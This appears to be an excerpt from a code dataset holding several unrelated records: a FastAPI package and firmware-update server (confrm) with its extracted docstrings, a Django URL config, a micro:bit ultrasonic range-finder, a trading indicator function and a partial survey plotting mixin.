pattern = '^[0-9a-zA-Z_-]+$'
regex = re.compile(pattern)
if regex.match(package_dict["name"]) is None:
msg = f"Package name does not match pattern {pattern}"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-010",
"message": msg,
"detail": "While attempting to add a new package the package name did not match the"
f" pattern {pattern}"
}
if not package.title:
package.title = package.name
packages = DB.table("packages")
query = Query()
existing_name = packages.get(query.name == package_dict["name"])
if existing_name is not None:
msg = "Package already exists"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-003",
"message": msg,
"detail": "While attempting to add a new package to the database a package with this " +
"name was found to already exist"
}
packages.insert(package_dict)
return {}
@APP.delete("/package/", status_code=status.HTTP_200_OK)
async def delete_package(name: str, response: Response):
"""Delete a package, its versions and all configs
Attributes:
name (str): Package to be deleted
response (Response): Starlette response object
"""
query = Query()
packages = DB.table("packages")
package_versions = DB.table("package_versions")
configs = DB.table("config")
(package_doc, status_code, err) = package_exists(name)
if package_doc is None:
response.status_code = status_code
return err
# Get all the package versions associated with this package
_versions = package_versions.search(query.name == name)
for version in _versions:
version_str = str(version["major"]) + "." + \
str(version["minor"]) + "." + \
str(version["revision"])
await delete_package_version(name, version_str, response)
# Get all the configs associated with this package
_configs = configs.search((query.type == "package") &
(query.id == name))
for config in _configs:
await delete_config(key=config["key"], type="package", response=response, id=name)
packages.remove(doc_ids=[package_doc.doc_id])
return {}
@APP.post("/package_version/", status_code=status.HTTP_201_CREATED)
async def add_package_version(
response: Response,
package_version: PackageVersion = Depends(),
set_active: bool = False,
canary_next: bool = False,
canary_id: str = "",
file: bytes = File(...)):
"""Uploads a package version with binary package
Arguments:
response (Response): Starlette response object for setting return codes
package_version (PackageVersion): Package description
set_active (bool): Default False, if true this version will be set active
file (bytes): File uploaded
"""
package_version_dict = package_version.__dict__
packages = DB.table("packages")
package_versions = DB.table("package_versions")
query = Query()
(package_doc, status_code, err) = package_exists(
package_version_dict["name"])
if package_doc is None:
response.status_code = status_code
return err
if canary_id:
nodes = DB.table("nodes")
node_doc = nodes.get(query.node_id == canary_id)
if not node_doc:
msg = "Node not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-026",
"message": msg,
"detail": "While attempting to add a new package version the node " +
" given was not found"
}
existing_version = package_versions.get((query.name == package_version_dict["name"]) &
(query.major == package_version_dict["major"]) &
(query.minor == package_version_dict["minor"]) &
(query.revision == package_version_dict["revision"]))
if existing_version is not None:
msg = "Version already exists for package"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-006",
"message": msg,
"detail": "While attempting to add a new package version the version given " +
" was found to be already used"
}
if package_version_dict["major"] < 0 or \
package_version_dict["minor"] < 0 or \
package_version_dict["revision"] < 0:
msg = "Version number elements cannot be negative"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-017",
"message": msg,
"detail": "While attempting to add a new package version the version given " +
" was found to contain negative numbers"
}
# Package was uploaded, create hash of binary
_h = SHA256.new()
_h.update(file)
# Store the binary in the data_store as a base64 encoded file
filename = uuid.uuid4().hex
blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
save_file = os.path.join(blob_dir, filename)
with open(save_file, "wb") as ptr:
ptr.write(base64.b64encode(file))
# Escape the strings
for key in package_version_dict.keys():
if isinstance(package_version_dict[key], str):
package_version_dict[key] = escape(package_version_dict[key])
# Update with blob details
package_version_dict["date"] = round(time.time())
package_version_dict["hash"] = _h.hexdigest()
package_version_dict["blob_id"] = filename
# Store in the database
package_versions.insert(package_version_dict)
version_str = str(package_version_dict["major"]) + "." + \
str(package_version_dict["minor"]) + "." + \
str(package_version_dict["revision"])
if set_active is True:
package_doc["current_version"] = version_str
packages.update(package_doc, query.name == package_doc["name"])
# If this is begin set to active, or a canary, delete existing canaries
if set_active is True or canary_id or canary_next is True:
try:
remove_canary(package=package_doc["name"])
except ValueError as err:
if str(err) != "Canary Not Found":
raise
if canary_id:
set_canary(node_id=canary_id,
package=package_doc["name"],
version=version_str)
if canary_next:
set_canary(node_id="*",
package=package_doc["name"],
version=version_str)
return {}
@APP.delete("/package_version/", status_code=status.HTTP_200_OK)
async def delete_package_version(package: str, version: str, response: Response):
""" Delete a package version
Attributes:
package (str): Package with version to be deleted
version (str): Version to be deleted
response (Response): Starlette response object
"""
(package_doc, status_code, err) = package_exists(package)
if package_doc is None:
response.status_code = status_code
return err
package_versions = DB.table("package_versions")
version_entry = get_package_version_by_version_string(package, version)
if version_entry is None:
msg = "Package version not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-020",
"message": msg,
"detail": "While attempting to delete a package version the version specified" +
" was not found"
}
package_versions.remove(doc_ids=[version_entry.doc_id])
blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
file_path = os.path.join(blob_dir, version_entry["blob_id"])
os.remove(file_path)
# Check for any hanging canary entries
try:
remove_canary(package=package)
except ValueError as err:
if str(err) != "Canary Not Found":
raise
if "current_version" in package_doc.keys() and package_doc["current_version"] == version:
msg = "Active version is not set"
logging.info(msg)
response.status_code = status.HTTP_200_OK
return {
"warning": "confrm-021",
"message": msg,
"detail": "While deleting a package version the version specified was set as the"
" current active version. The package version was deleted and the active version "
f" for package {package} is now not set"
}
return {}
@APP.get("/package/", status_code=status.HTTP_200_OK)
async def get_package(name: str, response: Response, lite: bool = False):
""" Returns the package information, including URL for download """
(package_doc, status_code, err) = package_exists(name)
if package_doc is None:
response.status_code = status_code
return err
return format_package_info(package_doc, lite)
@APP.get("/check_for_update/", status_code=status.HTTP_200_OK)
async def check_for_update(package: str, node_id: str, response: Response):
"""Called by node wanting to know if an update is available
Will return the most recent package version for the given package name.
Will check to see if a canary entry has been made for the node, if it is then
the be canary settings will be returned.
Arguments:
package (str): Package to check for update for
node_id (str): Id of the node making the request, or empty
response (Response): Starlette response object for setting return codes
Returns:
HTTP_200_OK / {"current_version": ..., "blob": ...} if found
HTTP_404_NOT_FOUND / Message header / {} if not found
"""
packages = DB.table("packages")
nodes = DB.table("nodes")
query = Query()
# Precedence is, node force, package canary then package version
node_doc = nodes.get(query.node_id == node_id)
if node_doc and "force" in node_doc.keys():
version_doc = get_package_version_by_version_string(
node_doc["force"]["package"],
node_doc["force"]["version"]
)
if version_doc is None:
# TODO Create test
logging.error("Force version not set, removing force entry...")
nodes.update(delete("force"), query.node_id == node_id)
else:
return {
"current_version": node_doc["force"]["version"],
"blob": version_doc["blob_id"],
"hash": version_doc["hash"],
"force": True
}
package_canary = get_canary(package=package)
if package_canary is not None and package_canary["node_id"] == "*":
set_canary(node_id=node_id, package=package,
version=package_canary["version"])
# Check to see if there is a canary entry for this node
canary = get_canary(node_id=node_id)
if canary is not None:
version_doc = get_package_version_by_version_string(
canary["package"],
canary["version"]
)
if version_doc is None:
# TODO: Create test
logging.error("Canary version not set, removing canary entry...")
remove_canary(node_id=node_id)
else:
return {
"current_version": canary["version"],
"blob": version_doc["blob_id"],
"hash": version_doc["hash"],
"force": canary["force"]
}
package_doc = packages.get(query.name == package)
if package_doc is None:
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-000",
"message": "Package not found",
"detail": "Package not found"
}
if "current_version" in package_doc.keys():
version_entry = get_package_version_by_version_string(
package,
package_doc["current_version"])
return {
"current_version": package_doc["current_version"],
"blob": version_entry["blob_id"],
"hash": version_entry["hash"],
"force": False
}
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-011",
"message": "No versions found for package",
"detail": "While checking for updates the package was found in the database, " +
"however there are no available versions of that package"
}
@APP.put("/set_active_version/")
async def set_active_version(package: str, version: str):
""" Set the active version via the API """
# TODO: Set error codes
query = Query()
packages = DB.table("packages")
package_entry = packages.get(query.name == package)
if package_entry is None:
return {"ok": False, "info": "Package does not exist"}
version_doc = get_package_version_by_version_string(package, version)
if len(version_doc) < 1:
return {"ok": False, "info": "Specified version does not exist for package"}
package_entry["current_version"] = version
result = packages.update(package_entry, query.name == package)
try:
remove_canary(package=package)
except ValueError as err:
if str(err) != "Canary Not Found":
raise
if len(result) > 0:
return {"ok": True}
return {"ok": False}
@APP.put("/node_package/", status_code=status.HTTP_200_OK)
async def node_package(node_id: str, package: str, response: Response, version: str = ""):
"""Force a node to use a particular package"""
(package_doc, status_code, err) = package_exists(package)
if package_doc is None:
response.status_code = status_code
return err
if not version:
if not package_doc["current_version"]:
msg = "Package has no active version"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-008",
"message": msg,
"detail": "While attempting to set a node to use a particular package the package" +
" was found to have no active versions and no specific version was given"
}
version = package_doc["current_version"]
else:
version_doc = get_package_version_by_version_string(package, version)
if version_doc is None:
msg = "Package version not found"
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-002",
"message": msg,
"detail": "While attempting to set a node to use a particular package the " +
" version given was not found"
}
(node_doc, status_code, err) = node_exists(node_id)
if node_doc is None:
response.status_code = status_code
return err
node_doc["force"] = {
"package": package,
"version": version
}
nodes = DB.table("nodes")
query = Query()
nodes.update(node_doc, query.node_id == node_id)
return {}
@APP.delete("/node_package/", status_code=status.HTTP_200_OK)
async def node_package(node_id: str, response: Response):
"""Delete entry forcing a node to use a particular package"""
(node_doc, status_code, err) = node_exists(node_id)
if node_doc is None:
response.status_code = status_code
return err
if "force" not in node_doc.keys():
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-007",
"message": "Node does not have a force package entry",
"detail": "While attempting to remove a package forcing entry for node" +
f" {node_id} no node forcing entry was found"
}
nodes = DB.table("nodes")
query = Query()
nodes.update(delete("force"), query.node_id == node_id)
return {}
@APP.get("/blob/", status_code=status.HTTP_200_OK)
async def get_blob(package: str, blob: str, response: Response):
""" Set a blob file """
query = Query()
package_versions = DB.table("package_versions")
(package_doc, status_code, err) = package_exists(package)
if package_doc is None:
response.status_code = status_code
return err
version_entry = package_versions.get(
query.name == package and
query.blob_id == blob)
if version_entry is None:
return {"ok": False, "info": "Specified blob does not exist for package"}
# Read the file from the data store
blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
with open(os.path.join(blob_dir, blob), "rb") as ptr:
data = base64.b64decode(ptr.read())
# Create sha256 of data from store
_h = SHA256.new()
_h.update(data)
# Check hash against original
if version_entry["hash"] != _h.hexdigest():
print("Hashes do not match...")
return
return ConfrmFileResponse(data)
@APP.put("/config/", status_code=status.HTTP_201_CREATED)
async def put_config(type: str, key: str, value: str, response: Response, id: str = ""):
"""Adds new config to the config database
Attributes:
type (str): One of global, package or node
id (str): Empty, package name or node_id
key (str): Key to be stored
value (str): Value to be stored
"""
query = Query()
config = DB.table("config")
types = ["global", "package", "node"]
if not type or type not in types:
msg = "Type cannot be empty and must be a valid type"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-015",
"message": msg,
"detail": "While attempting to add a new config the type of config given was empty"
" or was incorrect."
}
pattern = '^[0-9a-zA-Z_-]+$'
regex = re.compile(pattern)
if regex.match(key) is None:
msg = f"Key name does not match pattern {pattern}"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-016",
"message": msg,
"detail": "While attempting to add a new config the key given did not match the"
f" pattern {pattern}"
}
if type == "global":
key_doc = config.get((query.key == key) & (query.type == "global"))
if key_doc is not None:
config.update({"value": value}, doc_ids=[key_doc.doc_id])
# TODO: Warning for updating, including from and to values
else:
config_doc = {
"type": type,
"id": id,
"key": key,
"value": value
}
config.insert(config_doc)
elif type == "package":
(package_doc, status_code, err) = package_exists(id)
if package_doc is None:
response.status_code = status_code
return err
key_doc = config.get((query.key == key) &
(query.type == "package") &
(query.id == id))
if key_doc is not None:
config.update({"value": value}, doc_ids=[key_doc.doc_id])
# TODO: Warning for updating, including from and to values
else:
config_doc = {
"type": type,
"id": id,
"key": key,
"value": value
}
config.insert(config_doc)
elif type == "node":
(node_doc, status_code, err) = node_exists(id)
if node_doc is None:
response.status_code = status_code
return err
key_doc = config.get((query.key == key) &
(query.type == "node") &
(query.id == id))
if key_doc is not None:
config.update({"value": value}, doc_ids=[key_doc.doc_id])
# TODO: Warning for updating, including from and to values
else:
config_doc = {
"type": type,
"id": id,
"key": key,
"value": value
}
config.insert(config_doc)
return {}
@APP.get("/config/", status_code=status.HTTP_200_OK)
async def get_config(response: Response, key: str = "", package: str = "", node_id: str = ""):
"""Get configuration value from database
Attributes:
key (str): Key to retrieve
response (Response): Starlette response object
package (str): Package of requesting node
node_id (str): node_id of requesting node
"""
query = Query()
config = DB.table("config")
if node_id:
(doc, status_code, err) = node_exists(node_id)
if doc is None:
response.status_code = status_code
return err
doc = config.get((query.type == "node") &
(query.id == node_id) &
(query.key == key))
if doc is not None:
return {"value": doc["value"]}
if package:
(doc, status_code, err) = package_exists(package)
if doc is None:
response.status_code = status_code
return err
doc = config.get((query.type == "package") &
(query.id == package) &
(query.key == key))
if doc is not None:
return {"value": doc["value"]}
if not key:
# Do deepcopy to save changing database by accident
configs = deepcopy(config.all())
packages = DB.table("packages")
nodes = DB.table("nodes")
for config in configs:
if config["type"] == "package":
package_doc = packages.get(query.name == config["id"])
if package_doc is not None:
config["package_title"] = package_doc["title"]
elif config["type"] == "node":
node_doc = nodes.get(query.node_id == config["id"])
if node_doc is not None:
config["node_title"] = node_doc["title"]
return sort_configs(configs)
# Must be global...
doc = config.get((query.type == "global") &
(query.key == key))
if doc is None:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-012",
"message": msg,
"detail": f"Key \"{key}\" was not found for package \"{package}\""
" / node \"{node_id}\""
}
return {"value": doc["value"]}
@APP.delete("/config/", status_code=status.HTTP_200_OK)
async def delete_config(key: str, type: str, response: Response, id: str = ""):
"""Delete a config from the database
Attributes:
key (str): key to be deleted
type (str): global/package/node
id (str): package or node id as per type
response (Response): Starlette response object
"""
query = Query()
config = DB.table("config")
if type == "global":
global_doc = config.get((query.key == key) &
(query.type == "global"))
if global_doc is not None:
config.remove(doc_ids=[global_doc.doc_id])
else:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-024",
"message": msg,
"detail": f"Key \"{key}\" was not found, unable to delete it"
}
elif type == "package":
package_doc = config.get((query.key == key) &
(query.id == id) &
(query.type == "package"))
if package_doc is not None:
config.remove(doc_ids=[package_doc.doc_id])
else:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-024",
"message": msg,
"detail": f"Key \"{key}\" was not found for package \"{id}\","
" unable to delete it"
}
elif type == "node":
node_doc = config.get((query.key == key) &
(query.id == id) &
(query.type == "node"))
if node_doc is not None:
config.remove(doc_ids=[node_doc.doc_id])
else:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-024",
"message": msg,
"detail": f"Key \"{key}\" was not found for node \"{id}\","
" unable to delete it"
}
return {}
|
en
| 0.735254
|
Main FastAPI Implementation of confrm Copyright 2020 confrm.io Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Codes: 000 ERROR - - Package not found 001 ERROR - - Node not found 002 ERROR - - Package version not found 003 ERROR PUT /package/ Package already exists 004 ERROR PUT /package/ Package name cannot be empty 005 ERROR PUT /register_node/ Node id is invalid 006 ERROR PUT /package_version/ Version already exists for package 007 ERROR DELETE /node_package/ Node does not have a force package entry 008 ERROR PUT /node_package/ Package has no active version 009 010 ERROR PUT /package/ Package name does not match pattern 011 ERROR GET /check_for_update/ No versions found for package 012 ERROR GET /config/ Key not found 013 014 015 016 ERROR PUT /config/ Key name does not match pattern 017 ERROR POST /package_version/ Version numbers cannot be negative 018 ERROR PUT /node_package/ Package version not found 019 020 ERROR DELETE /package_version/ Package version not found 021 WARNING DELETE /package_version/ Active version not set 022 ERROR PUT /node_title/ Node does not exist 023 ERROR PUT /node_title/ Node title is too long 024 ERROR DELETE /config/ Key not found 025 026 ERROR POST /package_version/ Canary node not found 027 028 029 # pylint: disable=E0611 # pydantic data models are used to describe the inputs for the various REST # API calls, if the calls do not match these names and data-types then the call # to FastAPI will fail # pylint: disable=R0903 Definition of a package # pylint: disable=R0903 Definition of a package version Gets the config based on an environment variable and sets up global objects as required # pylint: disable=W0603 # Create the database from the data store # Check a blob folder exists Handles the version ordering logic Versions are sorted to be in descending order, with the currently active version at the top of the list (position 0) Attributes: name (str): package name string package ({}): [Optional] package dict, saves looking up the entry again Formats data in to correct dict form Can generate long form (for UI) or short form / lite (for nodes) Attributes: package (dict): package dict from DB lite (bool): if true a reduced response is generated # Minimal data for lite implementation Get package version using string name and string version number # pylint: disable=R0912 Sort configs by global/package/node, then by package name, then by node name Attributes: configs (list): List of config dicts # Find all unique keys and sort alphabetically # For each key find globals, then packages, then nodes # Sort the package end node elements alphabetically Creates an entry in the canary table for this node. If the node already exists then the previous entry will be deleted, and if an entry for the package already exists then that will be deleted. There can only be one entry per package and per node. Attributes: node_id (str): Node_id to be added package (str): Package name which the node will be set to version (str): Version of package the node will be set to # Check for existing node entry and delete if it exists # Check for existing entries for the given package, delete if exists # Insert new entry, force is set to True, once the node has been updated Removes the given package or node canary entry Exceptions: ValueError("Canary Not Found") Attributes: node_id (str): Node_id to be added package (str): Package name which the node will be set to Checks if a canary exists for given package or node_id Exceptions: ValueError("Input Not Set") Attributes: node_id (str): Node_id to be added package (str): Package name which the node will be set to Returns: None: No entry found TinyDB Document: Found entry Checks if package exists, returns tuple of (package_doc, status, error_dict) Attributes: packages (str): Package to search for Checks if node exists, returns tuple of (node_doc, status, error_dict) Attributes: packages (str): Package to search for # Files server in /static will point to ./dashboard (with respect to the running # script) Is called on application startup Is called on application shutdown Returns index page for UI Get basic info for UI elements Returns time of day from server as unix epoch time Helper to read back the canary status for a node Attributes: node_id (str): The node id to check against response (Response): Starlette response object for setting return codes # pylint: disable=R0913 Registers a node to the server Attributes: node_id (str): The node id, must be unique, MAC addresses work well package (str): Package installed on the node version (str): Version string of currently running package description (str): Description of package platform: (str): Platform type (i.e. esp32) request (Request): Starlette request object for getting client information response (Response): Starlette response object for setting return codes Returns: HTTP_200_OK HTTP_404_NOT_FOUND # Make sure input is sane # Asterisk is not allowed! # Update the package entry based on package name change, new version of a package # and register this as the last update time # Package changed # Version of package changed # Check if force package change # Check to see if a canary Returns a list of nodes, if package is set the only return nodes using that package, if a node is set then return the doc for that node. Attributes: package (str): name of package to return node list for # Make a new copy of list so we can make changes to elements for display layer without # changing the values in the database Sets the title of a node Attributes: package (str): name of package to return node list for Get package list and process for displaying on the UI # Packages contains a RAW list of packages, should process them down for # the UI - unique 'name' fields, with multiple 'versions' Add package description Attributes: package (Package): Package description to be added # Update storage record to include the local information # Escape the strings Delete a package, its versions and all configs Attributes: name (str): Package to be deleted response (Response): Starlette response object # Get all the package versions associated with this package # Get all the configs associated with this package Uploads a package version with binary package Arguments: response (Response): Starlette response object for setting return codes package_version (PackageVersion): Package description set_active (bool): Default False, if true this version will be set active file (bytes): File uploaded # Package was uploaded, create hash of binary # Store the binary in the data_store as a base64 encoded file # Escape the strings # Update with blob details # Store in the database # If this is begin set to active, or a canary, delete existing canaries Delete a package version Attributes: package (str): Package with version to be deleted version (str): Version to be deleted response (Response): Starlette response object # Check for any hanging canary entries Returns the package information, including URL for download Called by node wanting to know if an update is available Will return the most recent package version for the given package name. Will check to see if a canary entry has been made for the node, if it is then the be canary settings will be returned. Arguments: package (str): Package to check for update for node_id (str): Id of the node making the request, or empty response (Response): Starlette response object for setting return codes Returns: HTTP_200_OK / {"current_version": ..., "blob": ...} if found HTTP_404_NOT_FOUND / Message header / {} if not found # Precedence is, node force, package canary then package version # TODO Create test # Check to see if there is a canary entry for this node # TODO: Create test Set the active version via the API # TODO: Set error codes Force a node to use a particular package Delete entry forcing a node to use a particular package Set a blob file # Read the file from the data store # Create sha256 of data from store # Check hash against original Adds new config to the config database Attributes: type (str): One of global, package or node id (str): Empty, package name or node_id key (str): Key to be stored value (str): Value to be stored # TODO: Warning for updating, including from and to values # TODO: Warning for updating, including from and to values # TODO: Warning for updating, including from and to values Get configuration value from database Attributes: key (str): Key to retrieve response (Response): Starlette response object package (str): Package of requesting node node_id (str): node_id of requesting node # Do deepcopy to save changing database by accident # Must be global... Delete a config from the database Attributes: key (str): key to be deleted type (str): global/package/node id (str): package or node id as per type response (Response): Starlette response object
| 1.88511
| 2
|
web/accounts/urls.py
|
GuillaumeCaillou/carbure
| 0
|
6628522
|
from django.urls import path
from . import views
urlpatterns = [
path('profile', views.profile, name='profile'),
path('password_change', views.custom_password_change, name='custom_password_change'),
path('password_change_success', views.custom_password_change_success, name='custom_password_change_success'),
]
|
from django.urls import path
from . import views
urlpatterns = [
path('profile', views.profile, name='profile'),
path('password_change', views.custom_password_change, name='custom_password_change'),
path('password_change_success', views.custom_password_change_success, name='custom_password_change_success'),
]
|
none
| 1
| 1.63212
| 2
|
|
ultrasonic-sensor/range-finder.py
|
lyneca/microbit-demos
| 0
|
6628523
|
'An example range-finder using a ultrasonic sensor and the 25 leds'
from microbit import *
import machine
import time
TRIGGER = pin0
ECHO = pin1
ECHO.read_digital()
ECHO.set_pull(ECHO.NO_PULL)
def read_distance_cm(trigger_pin, echo_pin):
'''
Get distance in cm from an object using HC-SR04 ultrasonic sensor.
The sensor requires 5V in (doesn't operate properly on 3v).
Use voltage divider to lower ECHO signal to 3v.
Use a delay of at least 60ms between calls to read_distance.
'''
trigger_pin.write_digital(0)
time.sleep_us(2)
trigger_pin.write_digital(1)
time.sleep_us(10)
trigger_pin.write_digital(0)
time.sleep_us(10)
# 60000us timeout (max about 400cm). A larger timeout will make it possible to detect larger distances
pw = machine.time_pulse_us(echo_pin, 1, 60000)
if pw < 0:
# No full pulse detected before timeout
return None
else:
# Divide by 58 to get centimetres as per spec
return pw/58
while True:
# Read the distance and colour a number of leds proportional to the distance (from 0 to 200cm)
d = read_distance_cm(TRIGGER, ECHO) or 400
leds = 25*min(d/200, 1.0)
image = Image(''.join(''.join(str(9 if y*5+x < leds else 0) for x in range(5)) + ':' for y in range(5)))
display.show(image)
sleep(60)
|
'An example range-finder using a ultrasonic sensor and the 25 leds'
from microbit import *
import machine
import time
TRIGGER = pin0
ECHO = pin1
ECHO.read_digital()
ECHO.set_pull(ECHO.NO_PULL)
def read_distance_cm(trigger_pin, echo_pin):
'''
Get distance in cm from an object using HC-SR04 ultrasonic sensor.
The sensor requires 5V in (doesn't operate properly on 3v).
Use voltage divider to lower ECHO signal to 3v.
Use a delay of at least 60ms between calls to read_distance.
'''
trigger_pin.write_digital(0)
time.sleep_us(2)
trigger_pin.write_digital(1)
time.sleep_us(10)
trigger_pin.write_digital(0)
time.sleep_us(10)
# 60000us timeout (max about 400cm). A larger timeout will make it possible to detect larger distances
pw = machine.time_pulse_us(echo_pin, 1, 60000)
if pw < 0:
# No full pulse detected before timeout
return None
else:
# Divide by 58 to get centimetres as per spec
return pw/58
while True:
# Read the distance and colour a number of leds proportional to the distance (from 0 to 200cm)
d = read_distance_cm(TRIGGER, ECHO) or 400
leds = 25*min(d/200, 1.0)
image = Image(''.join(''.join(str(9 if y*5+x < leds else 0) for x in range(5)) + ':' for y in range(5)))
display.show(image)
sleep(60)
|
en
| 0.870252
|
Get distance in cm from an object using HC-SR04 ultrasonic sensor. The sensor requires 5V in (doesn't operate properly on 3v). Use voltage divider to lower ECHO signal to 3v. Use a delay of at least 60ms between calls to read_distance. # 60000us timeout (max about 400cm). A larger timeout will make it possible to detect larger distances # No full pulse detected before timeout # Divide by 58 to get centimetres as per spec # Read the distance and colour a number of leds proportional to the distance (from 0 to 200cm)
| 3.459886
| 3
|
Indicators/double_weighted_moving_average.py
|
Desil-sketch/Indicators-for-Jesse
| 1
|
6628524
|
from jesse.helpers import get_candle_source, slice_candles, np_shift
import numpy as np
from numba import njit
import talib
from typing import Union
from jesse.helpers import get_config, same_length, get_candle_source, slice_candles, np_shift
from collections import namedtuple
'''
https://www.tradingview.com/script/TZNHdMDL-Double-Weighted-Moving-Average/
'''
def dwma(candles: np.ndarray, length: int= 14, source_type: str = "close", sequential: bool = False ) -> Union[float, np.ndarray]:
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
dwma = talib.WMA(talib.WMA(source,length),length)
if sequential:
return dwma
else:
return dwma[-1]
|
from jesse.helpers import get_candle_source, slice_candles, np_shift
import numpy as np
from numba import njit
import talib
from typing import Union
from jesse.helpers import get_config, same_length, get_candle_source, slice_candles, np_shift
from collections import namedtuple
'''
https://www.tradingview.com/script/TZNHdMDL-Double-Weighted-Moving-Average/
'''
def dwma(candles: np.ndarray, length: int= 14, source_type: str = "close", sequential: bool = False ) -> Union[float, np.ndarray]:
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
dwma = talib.WMA(talib.WMA(source,length),length)
if sequential:
return dwma
else:
return dwma[-1]
|
en
| 0.530815
|
https://www.tradingview.com/script/TZNHdMDL-Double-Weighted-Moving-Average/
| 2.5315
| 3
|
survey/mixins/categorical_group_mixin.py
|
vahndi/quant-survey
| 2
|
6628525
|
<gh_stars>1-10
import matplotlib.pyplot as plt
from matplotlib.figure import Figure
from typing import List, Union, Dict, Optional, Tuple, Any
from survey.mixins.data_types.categorical_mixin import CategoricalMixin
class CategoricalGroupMixin(object):
items: List[CategoricalMixin]
def _set_categories(self):
"""
Set the Categories for the Group if all Categoricals in the Group have
the same Categories.
"""
ref_names = set(self.items[0].category_names)
all_names = set([
category_name for item in self.items
for category_name in item.category_names
])
if ref_names == all_names:
self._categories = self.items[0].categories
else:
self._categories = None
@property
def categories(self) -> Optional[Union[List[str], Dict[str, int]]]:
"""
Return the categories.
"""
return self._categories
@property
def category_names(self) -> Optional[List[str]]:
"""
Return the names of the categories.
"""
if isinstance(self._categories, list):
return self._categories
elif isinstance(self._categories, dict):
return list(self._categories.keys())
else:
return None
@property
def category_values(self) -> Optional[list]:
"""
Return the values of the categories.
"""
if isinstance(self._categories, list):
return self._categories
elif isinstance(self._categories, dict):
return list(self._categories.values())
else:
return None
def plot_distribution_grid(
self, n_rows: int, n_cols: int,
fig_size: Optional[Tuple[int, int]] = (16, 9),
filters: Optional[Dict[str, Any]] = None,
titles: Union[str, List[str], Dict[str, str]] = '',
x_labels: Union[str, List[str], Dict[str, str]] = '',
drop: Optional[Union[str, List[str]]] = None,
**kwargs
) -> Figure:
"""
Plot a grid of distributions of the group's questions.
:param n_rows: Number of rows in the grid.
:param n_cols: Number of columns in the grid.
:param fig_size: Size for the figure.
:param filters: Optional filters to apply to each question before
plotting.
:param titles: List of titles or dict mapping question keys or names to
titles.
:param x_labels: List of x-axis labels or dict mapping question keys or
names to labels.
:param drop: Optional category or categories to exclude from the plot.
:param kwargs: Other kwargs to pass to each question's
plot_distribution() method.
"""
categories = set(self._questions[0].categories)
share_x = 'all'
for item in self.items[1:]:
if set(item.categories) != categories:
share_x = 'none'
fig, axes = plt.subplots(nrows=n_rows, ncols=n_cols,
figsize=fig_size,
sharex=share_x, sharey='all')
for i, item in enumerate(self.items):
ax = axes.flat[i]
if filters is not None:
item = item.where(**filters)
if drop is not None:
item = item.drop(drop)
item.plot_distribution(ax=ax, **kwargs)
if isinstance(titles, str):
ax.set_title(titles)
elif isinstance(titles, list):
ax.set_title(titles[i])
elif isinstance(titles, dict):
if item.name in titles.keys():
ax.set_title(titles[item.name])
elif self.find_key(item) in titles.keys():
ax.set_title(titles[self.find_key(item)])
if isinstance(x_labels, str):
ax.set_xlabel(x_labels)
elif isinstance(x_labels, list):
ax.set_xlabel(x_labels[i])
elif isinstance(x_labels, dict):
if item.name in x_labels.keys():
ax.set_xlabel(x_labels[item.name])
elif self.find_key(item) in titles.keys():
ax.set_xlabel(x_labels[self.find_key(item)])
return fig
def plot_comparison_grid(
self,
other: 'CategoricalGroupMixin',
n_rows: int, n_cols: int,
filters: Optional[Dict[str, Any]] = None,
self_color: str = 'C0', other_color: str = 'C1',
self_name: Optional[str] = None, other_name: Optional[str] = None,
fig_size: Optional[Tuple[int, int]] = (16, 9),
titles: Union[str, List[str], Dict[str, str]] = '',
x_labels: Union[str, List[str], Dict[str, str]] = '',
**kwargs) -> Figure:
"""
Plot a grid of distributions of comparisons between the corresponding
questions of 2 groups.
:param other: The other group to use.
:param n_rows: Number of rows in the grid.
:param n_cols: Number of columns in the grid.
:param self_color: Color for this group's plot items.
:param other_color: Color for the other group's plot items.
:param self_name: Name for this group's plot items.
:param other_name: Name for the other group's plot items.
:param fig_size: Size for the figure.
:param filters: Optional filters to apply to each question before
plotting.
:param titles: List of titles or dict mapping question keys or names to
titles.
:param x_labels: List of x-axis labels or dict mapping question keys or
names to labels.
:param kwargs: Other kwargs to pass to each question's
plot_distribution() method.
"""
categories = set(self._questions[0].categories)
share_x = 'all'
for item in self.items[1:]:
if set(item.categories) != categories:
share_x = 'none'
fig, axes = plt.subplots(
nrows=n_rows, ncols=n_cols,
figsize=fig_size,
sharex=share_x, sharey='all'
)
if [self_name, other_name].count(None) not in (0, 2):
raise ValueError(
'Either rename both question groups or neither.'
)
if self_name is not None and self_name == other_name:
raise ValueError(
'Names of questions must be different to plot a comparison.'
)
for i, item in enumerate(self.items):
ax = axes.flat[i]
